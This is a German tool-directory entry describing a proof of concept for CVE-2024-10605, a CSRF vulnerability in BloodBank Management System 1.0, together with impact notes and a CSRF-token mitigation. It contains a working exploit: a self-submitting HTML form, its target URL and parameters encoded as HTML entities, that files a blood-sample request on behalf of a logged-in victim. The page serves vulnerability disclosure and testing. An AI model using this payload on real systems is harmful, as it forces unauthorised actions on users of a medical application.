Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10605 — Proof-of-Concept für CVE-2024-10605, eine CSRF-Schwachstelle in BloodBank Management System 1.0, die unbefugte Blutprobenanfragen ermöglicht. | Kitploit
Tools/GitHubGitHub/bevennyamande/cve-2024-10605
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubbevennyamande/cve-2024-10605

CVE-2024-10605

Proof-of-Concept für CVE-2024-10605, eine CSRF-Schwachstelle in BloodBank Management System 1.0, die unbefugte Blutprobenanfragen ermöglicht.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Betroffene Version:

  • BloodBank Management System: 1.0

Schwachstelleninformationen:

  • Schwachstellentyp: Cross Site Request Forgery (CSRF)
  • Schweregrad: HOCH
  • Status: Nicht gepatcht

Verwundbarer Endpunkt:

  • Pfad: file/request.php

Schwachstellenbeschreibung:

Auf diesem Endpunkt /file/request.php liegt eine Cross-Site-Request-Forgery vor, die es einem entfernten Benutzer ermöglicht, im Namen eines eingeloggten Empfängers eine Blutproben-Anfrage aus den verfügbaren Blutproben eines ausgewählten Krankenhauses zu initiieren.

Eine erfolgreiche Ausnutzung kann zu unbefugten Aktionen im Namen des Opfers führen. Darüber hinaus kann dies durch Besuch bösartiger Websites mit dem Payload ausgenutzt werden.


Proof of Concept (PoC):

Nachfolgend ein Beispiel eines CSRF-PoC-Angriffs, der eine Blutproben-Anfrage von einem eingeloggten Empfängerkonto initiiert:


<html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <form action="http://&#108;&#111;&#99;&#97;&#108;&#104;&#111;&#115;&#116;&#46;&#108;&#111;&#99;&#97;&#108;&#47;&#98;&#108;&#111;&#111;&#100;&#98;&#97;&#110;&#107;&#47;&#102;&#105;&#108;&#101;&#47;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#112;&#104;&#112;" method="POST" enctype="application/x-www-form-urlencoded">
            <input name="&#98;&#105;&#100;" value="&#49;&#54;">
            <input name="&#104;&#105;&#100;" value="&#51;">
            <input name="&#98;&#103;" value="&#66;&#45;">
            <input name="&#114;&#101;&#113;&#117;&#101;&#115;&#116;" value="&#82;&#101;&#113;&#117;&#101;&#115;&#116;&#43;&#83;&#97;&#109;&#112;&#108;&#101;">
        </form>
        <script>
            document.querySelector("form").submit();
        </script>
    </body>
</html>






Auswirkungen:

  • Datenmanipulation: Angreifer könnten den Benutzern angezeigte Inhalte ändern.
  • Reputationsschaden: Benutzer könnten aufgrund böswilligen Verhaltens das Vertrauen in das System verlieren.

Empfehlungen zur Schadensbegrenzung:

  1. CSRF-Token verwenden Implementieren Sie einen Mechanismus zur Abwehr von domänenübergreifendem Zugriff oder fügen Sie csrf-Token in Ihre Anfrage ein.
Tool herunterladen